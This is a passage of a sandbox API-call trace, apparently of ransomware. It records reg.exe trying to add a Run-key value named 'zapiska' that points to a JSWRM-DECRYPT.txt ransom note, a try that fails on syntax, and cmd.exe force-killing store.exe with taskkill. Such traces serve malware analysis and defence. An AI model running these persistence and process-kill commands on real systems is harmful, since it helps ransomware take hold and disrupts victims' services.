[0050.606] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKEY_CURRENT_CONFIG", cchCount2=-1) returned 3 [0050.606] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKLM", cchCount2=-1) returned 2 [0050.606] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0050.606] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0050.606] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0050.606] StrChrIW (lpStart="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", wMatch=0x5c) returned="\\Microsoft\\Windows\\CurrentVersion\\Run" [0050.606] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0050.606] StrChrIW (lpStart="Microsoft\\Windows\\CurrentVersion\\Run", wMatch=0x5c) returned="\\Windows\\CurrentVersion\\Run" [0050.606] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0050.606] StrChrIW (lpStart="Windows\\CurrentVersion\\Run", wMatch=0x5c) returned="\\CurrentVersion\\Run" [0050.606] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0050.606] StrChrIW (lpStart="CurrentVersion\\Run", wMatch=0x5c) returned="\\Run" [0050.606] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0050.607] StrChrIW (lpStart="Run", wMatch=0x5c) returned 0x0 [0050.607] RtlRestoreLastWin32Error () returned 0x2e92000 [0050.607] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0050.607] RtlRestoreLastWin32Error () returned 0x2e92000 [0050.607] lstrlenW (lpString="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0050.607] GetProcessHeap () returned 0x3090000 [0050.607] RtlAllocateHeap (HeapHandle=0x3090000, Flags=0xc, Size=0x5c) returned 0x3094258 [0050.607] GetProcessHeap () returned 0x3090000 [0050.607] RtlAllocateHeap (HeapHandle=0x3090000, Flags=0xc, Size=0x88) returned 0x3099328 [0050.607] GetProcessHeap () returned 0x3090000 [0050.607] GetProcessHeap () returned 0x3090000 [0050.607] HeapValidate (hHeap=0x3090000, dwFlags=0x0, lpMem=0x3094228) returned 1 [0050.607] GetProcessHeap () returned 0x3090000 [0050.607] RtlSizeHeap (HeapHandle=0x3090000, Flags=0x0, MemoryPointer=0x3094228) returned 0x28 [0050.607] RtlFreeHeap (HeapHandle=0x3090000, Flags=0x0, BaseAddress=0x3094228) returned 1 [0050.607] GetProcessHeap () returned 0x3090000 [0050.607] GetProcessHeap () returned 0x3090000 [0050.607] HeapValidate (hHeap=0x3090000, dwFlags=0x0, lpMem=0x30941b8) returned 1 [0050.607] GetProcessHeap () returned 0x3090000 [0050.607] RtlSizeHeap (HeapHandle=0x3090000, Flags=0x0, MemoryPointer=0x30941b8) returned 0x66 [0050.607] RtlFreeHeap (HeapHandle=0x3090000, Flags=0x0, BaseAddress=0x30941b8) returned 1 [0050.607] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/v", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 2 [0050.607] lstrlenW (lpString="zapiska") returned 7 [0050.607] GetProcessHeap () returned 0x3090000 [0050.607] RtlAllocateHeap (HeapHandle=0x3090000, Flags=0xc, Size=0x10) returned 0x3097b68 [0050.607] lstrlenW (lpString="zapiska") returned 7 [0050.607] StrChrW (lpStart=" \x09", wMatch=0x7a) returned 0x0 [0050.607] StrChrW (lpStart=" \x09", wMatch=0x7a) returned 0x0 [0050.607] StrChrW (lpStart=" \x09", wMatch=0x61) returned 0x0 [0050.607] StrChrW (lpStart=" \x09", wMatch=0x70) returned 0x0 [0050.607] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0050.607] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0050.608] StrChrW (lpStart=" \x09", wMatch=0x6b) returned 0x0 [0050.608] StrChrW (lpStart=" \x09", wMatch=0x61) returned 0x0 [0050.608] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 1 [0050.608] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-v", cchCount2=-1) returned 1 [0050.608] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 1 [0050.608] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-ve", cchCount2=-1) returned 1 [0050.608] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/t", cchCount2=-1) returned 1 [0050.608] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-t", cchCount2=-1) returned 1 [0050.608] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/s", cchCount2=-1) returned 1 [0050.608] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-s", cchCount2=-1) returned 1 [0050.608] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/d", cchCount2=-1) returned 2 [0050.608] lstrlenW (lpString="C:\\ProgramData\\JSWRM-DECRYPT.txt") returned 32 [0050.608] GetProcessHeap () returned 0x3090000 [0050.608] RtlAllocateHeap (HeapHandle=0x3090000, Flags=0xc, Size=0x42) returned 0x30941b8 [0050.608] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="-y", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 3 [0050.608] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="-y", cchCount1=-1, lpString2="-v", cchCount2=-1) returned 3 [0050.608] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="-y", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 3 [0050.608] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="-y", cchCount1=-1, lpString2="-ve", cchCount2=-1) returned 3 [0050.608] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="-y", cchCount1=-1, lpString2="/t", cchCount2=-1) returned 3 [0050.608] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="-y", cchCount1=-1, lpString2="-t", cchCount2=-1) returned 3 [0050.608] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="-y", cchCount1=-1, lpString2="/s", cchCount2=-1) returned 3 [0050.608] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="-y", cchCount1=-1, lpString2="-s", cchCount2=-1) returned 3 [0050.608] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="-y", cchCount1=-1, lpString2="/d", cchCount2=-1) returned 3 [0050.608] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="-y", cchCount1=-1, lpString2="-d", cchCount2=-1) returned 3 [0050.608] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="-y", cchCount1=-1, lpString2="/f", cchCount2=-1) returned 3 [0050.608] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="-y", cchCount1=-1, lpString2="-f", cchCount2=-1) returned 3 [0050.608] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="-y", cchCount1=-1, lpString2="/reg:32", cchCount2=-1) returned 3 [0050.608] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="-y", cchCount1=-1, lpString2="-reg:32", cchCount2=-1) returned 3 [0050.608] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="-y", cchCount1=-1, lpString2="/reg:64", cchCount2=-1) returned 3 [0050.608] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="-y", cchCount1=-1, lpString2="-reg:64", cchCount2=-1) returned 3 [0050.608] RtlRestoreLastWin32Error () returned 0x2e92000 [0050.608] GetProcessHeap () returned 0x3090000 [0050.608] RtlAllocateHeap (HeapHandle=0x3090000, Flags=0xc, Size=0x14) returned 0x3099b40 [0050.608] GetProcessHeap () returned 0x3090000 [0050.608] RtlAllocateHeap (HeapHandle=0x3090000, Flags=0xc, Size=0x14) returned 0x3099c00 [0050.609] GetProcessHeap () returned 0x3090000 [0050.609] RtlAllocateHeap (HeapHandle=0x3090000, Flags=0xc, Size=0x10) returned 0x3097af0 [0050.609] _memicmp (_Buf1=0x3097af0, _Buf2=0xa41b8c, _Size=0x7) returned 0 [0050.609] GetProcessHeap () returned 0x3090000 [0050.609] RtlAllocateHeap (HeapHandle=0x3090000, Flags=0xc, Size=0x200) returned 0x3099c20 [0050.609] LoadStringW (in: hInstance=0x0, uID=0x67, lpBuffer=0x3099c20, cchBufferMax=256 | out: lpBuffer="ERROR: Invalid syntax.\nType \"REG %s /?\" for usage.\n") returned 0x33 [0050.617] lstrlenW (lpString="ERROR: Invalid syntax.\nType \"REG %s /?\" for usage.\n") returned 51 [0050.617] GetProcessHeap () returned 0x3090000 [0050.617] RtlAllocateHeap (HeapHandle=0x3090000, Flags=0xc, Size=0x68) returned 0x3099418 [0050.617] GetProcessHeap () returned 0x3090000 [0050.617] RtlAllocateHeap (HeapHandle=0x3090000, Flags=0xc, Size=0x14) returned 0x3099be0 [0050.617] GetProcessHeap () returned 0x3090000 [0050.617] RtlAllocateHeap (HeapHandle=0x3090000, Flags=0xc, Size=0x10) returned 0x3097a78 [0050.617] _memicmp (_Buf1=0x3097a78, _Buf2=0xa41b8c, _Size=0x7) returned 0 [0050.617] GetProcessHeap () returned 0x3090000 [0050.617] RtlAllocateHeap (HeapHandle=0x3090000, Flags=0xc, Size=0x200) returned 0x309a330 [0050.617] _vsnwprintf (in: _Buffer=0x309a330, _BufferCount=0xff, _Format="ERROR: Invalid syntax.\nType \"REG %s /?\" for usage.\n", _ArgList=0x2ddf914 | out: _Buffer="ERROR: Invalid syntax.\nType \"REG ADD /?\" for usage.\n") returned 52 [0050.617] GetLastError () returned 0x800401e4 [0050.617] lstrlenW (lpString="ERROR: Invalid syntax.\nType \"REG ADD /?\" for usage.\n") returned 52 [0050.617] GetProcessHeap () returned 0x3090000 [0050.617] GetProcessHeap () returned 0x3090000 [0050.618] HeapValidate (hHeap=0x3090000, dwFlags=0x0, lpMem=0x3094640) returned 1 [0050.618] GetProcessHeap () returned 0x3090000 [0050.618] RtlSizeHeap (HeapHandle=0x3090000, Flags=0x0, MemoryPointer=0x3094640) returned 0x2 [0050.618] RtlFreeHeap (HeapHandle=0x3090000, Flags=0x0, BaseAddress=0x3094640) returned 1 [0050.618] GetProcessHeap () returned 0x3090000 [0050.618] RtlAllocateHeap (HeapHandle=0x3090000, Flags=0xc, Size=0x6a) returned 0x3099488 [0050.618] RtlRestoreLastWin32Error () returned 0x2e92000 [0050.618] __iob_func () returned 0x77ae2608 [0050.618] _fileno (_File=0x77ae2648) returned 2 [0050.618] _errno () returned 0x34505b0 [0050.618] _get_osfhandle (_FileHandle=2) returned 0x94 [0050.618] _errno () returned 0x34505b0 [0050.618] GetFileType (hFile=0x94) returned 0x2 [0050.618] GetStdHandle (nStdHandle=0xfffffff4) returned 0x94 [0050.618] GetFileType (hFile=0x94) returned 0x2 [0050.618] GetConsoleMode (in: hConsoleHandle=0x94, lpMode=0x2ddf908 | out: lpMode=0x2ddf908) returned 1 [0050.629] __iob_func () returned 0x77ae2608 [0050.629] __iob_func () returned 0x77ae2608 [0050.629] GetStdHandle (nStdHandle=0xfffffff4) returned 0x94 [0050.629] lstrlenW (lpString="ERROR: Invalid syntax.\nType \"REG ADD /?\" for usage.\n") returned 52 [0050.629] WriteConsoleW (in: hConsoleOutput=0x94, lpBuffer=0x3099488*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x2ddf92c, lpReserved=0x0 | out: lpBuffer=0x3099488*, lpNumberOfCharsWritten=0x2ddf92c*=0x34) returned 1 [0050.631] GetProcessHeap () returned 0x3090000 [0050.631] GetProcessHeap () returned 0x3090000 [0050.631] HeapValidate (hHeap=0x3090000, dwFlags=0x0, lpMem=0x3094258) returned 1 [0050.631] GetProcessHeap () returned 0x3090000 [0050.632] RtlSizeHeap (HeapHandle=0x3090000, Flags=0x0, MemoryPointer=0x3094258) returned 0x5c [0050.632] RtlFreeHeap (HeapHandle=0x3090000, Flags=0x0, BaseAddress=0x3094258) returned 1 [0050.632] GetProcessHeap () returned 0x3090000 [0050.632] GetProcessHeap () returned 0x3090000 [0050.632] HeapValidate (hHeap=0x3090000, dwFlags=0x0, lpMem=0x3099328) returned 1 [0050.632] GetProcessHeap () returned 0x3090000 [0050.632] RtlSizeHeap (HeapHandle=0x3090000, Flags=0x0, MemoryPointer=0x3099328) returned 0x88 [0050.632] RtlFreeHeap (HeapHandle=0x3090000, Flags=0x0, BaseAddress=0x3099328) returned 1 [0050.632] GetProcessHeap () returned 0x3090000 [0050.632] GetProcessHeap () returned 0x3090000 [0050.632] HeapValidate (hHeap=0x3090000, dwFlags=0x0, lpMem=0x3097b68) returned 1 [0050.632] GetProcessHeap () returned 0x3090000 [0050.632] RtlSizeHeap (HeapHandle=0x3090000, Flags=0x0, MemoryPointer=0x3097b68) returned 0x10 [0050.632] RtlFreeHeap (HeapHandle=0x3090000, Flags=0x0, BaseAddress=0x3097b68) returned 1 [0050.632] GetProcessHeap () returned 0x3090000 [0050.632] GetProcessHeap () returned 0x3090000 [0050.632] HeapValidate (hHeap=0x3090000, dwFlags=0x0, lpMem=0x30941b8) returned 1 [0050.632] GetProcessHeap () returned 0x3090000 [0050.632] RtlSizeHeap (HeapHandle=0x3090000, Flags=0x0, MemoryPointer=0x30941b8) returned 0x42 [0050.632] RtlFreeHeap (HeapHandle=0x3090000, Flags=0x0, BaseAddress=0x30941b8) returned 1 [0050.632] GetProcessHeap () returned 0x3090000 [0050.632] GetProcessHeap () returned 0x3090000 [0050.632] HeapValidate (hHeap=0x3090000, dwFlags=0x0, lpMem=0x309a330) returned 1 [0050.632] GetProcessHeap () returned 0x3090000 [0050.632] RtlSizeHeap (HeapHandle=0x3090000, Flags=0x0, MemoryPointer=0x309a330) returned 0x200 [0050.632] RtlFreeHeap (HeapHandle=0x3090000, Flags=0x0, BaseAddress=0x309a330) returned 1 [0050.632] GetProcessHeap () returned 0x3090000 [0050.632] GetProcessHeap () returned 0x3090000 [0050.632] HeapValidate (hHeap=0x3090000, dwFlags=0x0, lpMem=0x3097a78) returned 1 [0050.632] GetProcessHeap () returned 0x3090000 [0050.632] RtlSizeHeap (HeapHandle=0x3090000, Flags=0x0, MemoryPointer=0x3097a78) returned 0x10 [0050.632] RtlFreeHeap (HeapHandle=0x3090000, Flags=0x0, BaseAddress=0x3097a78) returned 1 [0050.632] GetProcessHeap () returned 0x3090000 [0050.632] GetProcessHeap () returned 0x3090000 [0050.632] HeapValidate (hHeap=0x3090000, dwFlags=0x0, lpMem=0x3099be0) returned 1 [0050.632] GetProcessHeap () returned 0x3090000 [0050.632] RtlSizeHeap (HeapHandle=0x3090000, Flags=0x0, MemoryPointer=0x3099be0) returned 0x14 [0050.632] RtlFreeHeap (HeapHandle=0x3090000, Flags=0x0, BaseAddress=0x3099be0) returned 1 [0050.633] GetProcessHeap () returned 0x3090000 [0050.633] GetProcessHeap () returned 0x3090000 [0050.633] HeapValidate (hHeap=0x3090000, dwFlags=0x0, lpMem=0x3099c20) returned 1 [0050.633] GetProcessHeap () returned 0x3090000 [0050.633] RtlSizeHeap (HeapHandle=0x3090000, Flags=0x0, MemoryPointer=0x3099c20) returned 0x200 [0050.633] RtlFreeHeap (HeapHandle=0x3090000, Flags=0x0, BaseAddress=0x3099c20) returned 1 [0050.633] GetProcessHeap () returned 0x3090000 [0050.633] GetProcessHeap () returned 0x3090000 [0050.633] HeapValidate (hHeap=0x3090000, dwFlags=0x0, lpMem=0x3097af0) returned 1 [0050.633] GetProcessHeap () returned 0x3090000 [0050.633] RtlSizeHeap (HeapHandle=0x3090000, Flags=0x0, MemoryPointer=0x3097af0) returned 0x10 [0050.633] RtlFreeHeap (HeapHandle=0x3090000, Flags=0x0, BaseAddress=0x3097af0) returned 1 [0050.633] GetProcessHeap () returned 0x3090000 [0050.633] GetProcessHeap () returned 0x3090000 [0050.633] HeapValidate (hHeap=0x3090000, dwFlags=0x0, lpMem=0x3099c00) returned 1 [0050.633] GetProcessHeap () returned 0x3090000 [0050.633] RtlSizeHeap (HeapHandle=0x3090000, Flags=0x0, MemoryPointer=0x3099c00) returned 0x14 [0050.633] RtlFreeHeap (HeapHandle=0x3090000, Flags=0x0, BaseAddress=0x3099c00) returned 1 [0050.633] GetProcessHeap () returned 0x3090000 [0050.633] GetProcessHeap () returned 0x3090000 [0050.633] HeapValidate (hHeap=0x3090000, dwFlags=0x0, lpMem=0x3093b00) returned 1 [0050.633] GetProcessHeap () returned 0x3090000 [0050.633] RtlSizeHeap (HeapHandle=0x3090000, Flags=0x0, MemoryPointer=0x3093b00) returned 0x6c [0050.633] RtlFreeHeap (HeapHandle=0x3090000, Flags=0x0, BaseAddress=0x3093b00) returned 1 [0050.633] GetProcessHeap () returned 0x3090000 [0050.633] GetProcessHeap () returned 0x3090000 [0050.633] HeapValidate (hHeap=0x3090000, dwFlags=0x0, lpMem=0x3097c28) returned 1 [0050.633] GetProcessHeap () returned 0x3090000 [0050.633] RtlSizeHeap (HeapHandle=0x3090000, Flags=0x0, MemoryPointer=0x3097c28) returned 0x10 [0050.633] RtlFreeHeap (HeapHandle=0x3090000, Flags=0x0, BaseAddress=0x3097c28) returned 1 [0050.633] GetProcessHeap () returned 0x3090000 [0050.633] GetProcessHeap () returned 0x3090000 [0050.633] HeapValidate (hHeap=0x3090000, dwFlags=0x0, lpMem=0x3094918) returned 1 [0050.633] GetProcessHeap () returned 0x3090000 [0050.633] RtlSizeHeap (HeapHandle=0x3090000, Flags=0x0, MemoryPointer=0x3094918) returned 0x14 [0050.633] RtlFreeHeap (HeapHandle=0x3090000, Flags=0x0, BaseAddress=0x3094918) returned 1 [0050.633] GetProcessHeap () returned 0x3090000 [0050.633] GetProcessHeap () returned 0x3090000 [0050.633] HeapValidate (hHeap=0x3090000, dwFlags=0x0, lpMem=0x3093ad8) returned 1 [0050.634] GetProcessHeap () returned 0x3090000 [0050.634] RtlSizeHeap (HeapHandle=0x3090000, Flags=0x0, MemoryPointer=0x3093ad8) returned 0x1e [0050.634] RtlFreeHeap (HeapHandle=0x3090000, Flags=0x0, BaseAddress=0x3093ad8) returned 1 [0050.634] GetProcessHeap () returned 0x3090000 [0050.634] GetProcessHeap () returned 0x3090000 [0050.634] HeapValidate (hHeap=0x3090000, dwFlags=0x0, lpMem=0x3097b80) returned 1 [0050.634] GetProcessHeap () returned 0x3090000 [0050.634] RtlSizeHeap (HeapHandle=0x3090000, Flags=0x0, MemoryPointer=0x3097b80) returned 0x10 [0050.634] RtlFreeHeap (HeapHandle=0x3090000, Flags=0x0, BaseAddress=0x3097b80) returned 1 [0050.634] GetProcessHeap () returned 0x3090000 [0050.634] GetProcessHeap () returned 0x3090000 [0050.634] HeapValidate (hHeap=0x3090000, dwFlags=0x0, lpMem=0x30948f8) returned 1 [0050.634] GetProcessHeap () returned 0x3090000 [0050.634] RtlSizeHeap (HeapHandle=0x3090000, Flags=0x0, MemoryPointer=0x30948f8) returned 0x14 [0050.634] RtlFreeHeap (HeapHandle=0x3090000, Flags=0x0, BaseAddress=0x30948f8) returned 1 [0050.634] GetProcessHeap () returned 0x3090000 [0050.634] GetProcessHeap () returned 0x3090000 [0050.634] HeapValidate (hHeap=0x3090000, dwFlags=0x0, lpMem=0x3099488) returned 1 [0050.634] GetProcessHeap () returned 0x3090000 [0050.634] RtlSizeHeap (HeapHandle=0x3090000, Flags=0x0, MemoryPointer=0x3099488) returned 0x6a [0050.634] RtlFreeHeap (HeapHandle=0x3090000, Flags=0x0, BaseAddress=0x3099488) returned 1 [0050.634] GetProcessHeap () returned 0x3090000 [0050.634] GetProcessHeap () returned 0x3090000 [0050.634] HeapValidate (hHeap=0x3090000, dwFlags=0x0, lpMem=0x3094378) returned 1 [0050.634] GetProcessHeap () returned 0x3090000 [0050.634] RtlSizeHeap (HeapHandle=0x3090000, Flags=0x0, MemoryPointer=0x3094378) returned 0x14 [0050.634] RtlFreeHeap (HeapHandle=0x3090000, Flags=0x0, BaseAddress=0x3094378) returned 1 [0050.634] GetProcessHeap () returned 0x3090000 [0050.634] GetProcessHeap () returned 0x3090000 [0050.634] HeapValidate (hHeap=0x3090000, dwFlags=0x0, lpMem=0x3099418) returned 1 [0050.634] GetProcessHeap () returned 0x3090000 [0050.634] RtlSizeHeap (HeapHandle=0x3090000, Flags=0x0, MemoryPointer=0x3099418) returned 0x68 [0050.634] RtlFreeHeap (HeapHandle=0x3090000, Flags=0x0, BaseAddress=0x3099418) returned 1 [0050.634] GetProcessHeap () returned 0x3090000 [0050.634] GetProcessHeap () returned 0x3090000 [0050.634] HeapValidate (hHeap=0x3090000, dwFlags=0x0, lpMem=0x3094138) returned 1 [0050.634] GetProcessHeap () returned 0x3090000 [0050.634] RtlSizeHeap (HeapHandle=0x3090000, Flags=0x0, MemoryPointer=0x3094138) returned 0x14 [0050.635] RtlFreeHeap (HeapHandle=0x3090000, Flags=0x0, BaseAddress=0x3094138) returned 1 [0050.635] GetProcessHeap () returned 0x3090000 [0050.635] GetProcessHeap () returned 0x3090000 [0050.635] HeapValidate (hHeap=0x3090000, dwFlags=0x0, lpMem=0x3093d18) returned 1 [0050.635] GetProcessHeap () returned 0x3090000 [0050.635] RtlSizeHeap (HeapHandle=0x3090000, Flags=0x0, MemoryPointer=0x3093d18) returned 0x14 [0050.635] RtlFreeHeap (HeapHandle=0x3090000, Flags=0x0, BaseAddress=0x3093d18) returned 1 [0050.635] GetProcessHeap () returned 0x3090000 [0050.635] GetProcessHeap () returned 0x3090000 [0050.635] HeapValidate (hHeap=0x3090000, dwFlags=0x0, lpMem=0x3093d38) returned 1 [0050.635] GetProcessHeap () returned 0x3090000 [0050.635] RtlSizeHeap (HeapHandle=0x3090000, Flags=0x0, MemoryPointer=0x3093d38) returned 0x14 [0050.635] RtlFreeHeap (HeapHandle=0x3090000, Flags=0x0, BaseAddress=0x3093d38) returned 1 [0050.635] GetProcessHeap () returned 0x3090000 [0050.635] GetProcessHeap () returned 0x3090000 [0050.635] HeapValidate (hHeap=0x3090000, dwFlags=0x0, lpMem=0x3097be0) returned 1 [0050.635] GetProcessHeap () returned 0x3090000 [0050.635] RtlSizeHeap (HeapHandle=0x3090000, Flags=0x0, MemoryPointer=0x3097be0) returned 0x10 [0050.635] RtlFreeHeap (HeapHandle=0x3090000, Flags=0x0, BaseAddress=0x3097be0) returned 1 [0050.635] GetProcessHeap () returned 0x3090000 [0050.635] GetProcessHeap () returned 0x3090000 [0050.635] HeapValidate (hHeap=0x3090000, dwFlags=0x0, lpMem=0x3093d58) returned 1 [0050.635] GetProcessHeap () returned 0x3090000 [0050.635] RtlSizeHeap (HeapHandle=0x3090000, Flags=0x0, MemoryPointer=0x3093d58) returned 0x14 [0050.635] RtlFreeHeap (HeapHandle=0x3090000, Flags=0x0, BaseAddress=0x3093d58) returned 1 [0050.635] GetProcessHeap () returned 0x3090000 [0050.635] GetProcessHeap () returned 0x3090000 [0050.635] HeapValidate (hHeap=0x3090000, dwFlags=0x0, lpMem=0x30943f8) returned 1 [0050.635] GetProcessHeap () returned 0x3090000 [0050.635] RtlSizeHeap (HeapHandle=0x3090000, Flags=0x0, MemoryPointer=0x30943f8) returned 0x14 [0050.635] RtlFreeHeap (HeapHandle=0x3090000, Flags=0x0, BaseAddress=0x30943f8) returned 1 [0050.635] GetProcessHeap () returned 0x3090000 [0050.635] GetProcessHeap () returned 0x3090000 [0050.635] HeapValidate (hHeap=0x3090000, dwFlags=0x0, lpMem=0x3094418) returned 1 [0050.635] GetProcessHeap () returned 0x3090000 [0050.635] RtlSizeHeap (HeapHandle=0x3090000, Flags=0x0, MemoryPointer=0x3094418) returned 0x14 [0050.635] RtlFreeHeap (HeapHandle=0x3090000, Flags=0x0, BaseAddress=0x3094418) returned 1 [0050.635] GetProcessHeap () returned 0x3090000 [0050.635] GetProcessHeap () returned 0x3090000 [0050.635] HeapValidate (hHeap=0x3090000, dwFlags=0x0, lpMem=0x3094438) returned 1 [0050.636] GetProcessHeap () returned 0x3090000 [0050.636] RtlSizeHeap (HeapHandle=0x3090000, Flags=0x0, MemoryPointer=0x3094438) returned 0x14 [0050.636] RtlFreeHeap (HeapHandle=0x3090000, Flags=0x0, BaseAddress=0x3094438) returned 1 [0050.636] GetProcessHeap () returned 0x3090000 [0050.636] GetProcessHeap () returned 0x3090000 [0050.636] HeapValidate (hHeap=0x3090000, dwFlags=0x0, lpMem=0x3097bf8) returned 1 [0050.636] GetProcessHeap () returned 0x3090000 [0050.636] RtlSizeHeap (HeapHandle=0x3090000, Flags=0x0, MemoryPointer=0x3097bf8) returned 0x10 [0050.636] RtlFreeHeap (HeapHandle=0x3090000, Flags=0x0, BaseAddress=0x3097bf8) returned 1 [0050.636] GetProcessHeap () returned 0x3090000 [0050.636] GetProcessHeap () returned 0x3090000 [0050.636] HeapValidate (hHeap=0x3090000, dwFlags=0x0, lpMem=0x30948d8) returned 1 [0050.636] GetProcessHeap () returned 0x3090000 [0050.636] RtlSizeHeap (HeapHandle=0x3090000, Flags=0x0, MemoryPointer=0x30948d8) returned 0x14 [0050.636] RtlFreeHeap (HeapHandle=0x3090000, Flags=0x0, BaseAddress=0x30948d8) returned 1 [0050.636] GetProcessHeap () returned 0x3090000 [0050.636] GetProcessHeap () returned 0x3090000 [0050.636] HeapValidate (hHeap=0x3090000, dwFlags=0x0, lpMem=0x3094938) returned 1 [0050.636] GetProcessHeap () returned 0x3090000 [0050.636] RtlSizeHeap (HeapHandle=0x3090000, Flags=0x0, MemoryPointer=0x3094938) returned 0x14 [0050.636] RtlFreeHeap (HeapHandle=0x3090000, Flags=0x0, BaseAddress=0x3094938) returned 1 [0050.636] GetProcessHeap () returned 0x3090000 [0050.636] GetProcessHeap () returned 0x3090000 [0050.636] HeapValidate (hHeap=0x3090000, dwFlags=0x0, lpMem=0x3099b40) returned 1 [0050.636] GetProcessHeap () returned 0x3090000 [0050.636] RtlSizeHeap (HeapHandle=0x3090000, Flags=0x0, MemoryPointer=0x3099b40) returned 0x14 [0050.636] RtlFreeHeap (HeapHandle=0x3090000, Flags=0x0, BaseAddress=0x3099b40) returned 1 [0050.636] GetProcessHeap () returned 0x3090000 [0050.636] GetProcessHeap () returned 0x3090000 [0050.636] HeapValidate (hHeap=0x3090000, dwFlags=0x0, lpMem=0x3097c10) returned 1 [0050.636] GetProcessHeap () returned 0x3090000 [0050.636] RtlSizeHeap (HeapHandle=0x3090000, Flags=0x0, MemoryPointer=0x3097c10) returned 0x10 [0050.636] RtlFreeHeap (HeapHandle=0x3090000, Flags=0x0, BaseAddress=0x3097c10) returned 1 [0050.636] GetProcessHeap () returned 0x3090000 [0050.636] GetProcessHeap () returned 0x3090000 [0050.636] HeapValidate (hHeap=0x3090000, dwFlags=0x0, lpMem=0x3094a88) returned 1 [0050.636] GetProcessHeap () returned 0x3090000 [0050.636] RtlSizeHeap (HeapHandle=0x3090000, Flags=0x0, MemoryPointer=0x3094a88) returned 0x14 [0050.637] RtlFreeHeap (HeapHandle=0x3090000, Flags=0x0, BaseAddress=0x3094a88) returned 1 [0050.637] GetProcessHeap () returned 0x3090000 [0050.637] GetProcessHeap () returned 0x3090000 [0050.637] HeapValidate (hHeap=0x3090000, dwFlags=0x0, lpMem=0x3097b38) returned 1 [0050.637] GetProcessHeap () returned 0x3090000 [0050.637] RtlSizeHeap (HeapHandle=0x3090000, Flags=0x0, MemoryPointer=0x3097b38) returned 0x10 [0050.637] RtlFreeHeap (HeapHandle=0x3090000, Flags=0x0, BaseAddress=0x3097b38) returned 1 [0050.637] exit (_Code=1) Thread: id = 35 os_tid = 0xb84 Process: id = "8" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x795a000" os_pid = "0x9b0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb08" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c taskkill.exe taskkill /f /im store.exe" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000103c1" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 37 os_tid = 0x344 [0051.529] GetModuleHandleA (lpModuleName=0x0) returned 0xdf0000 [0051.529] __set_app_type (_Type=0x1) [0051.529] __p__fmode () returned 0x77ae3c14 [0051.529] __p__commode () returned 0x77ae49ec [0051.529] SetUnhandledExceptionFilter 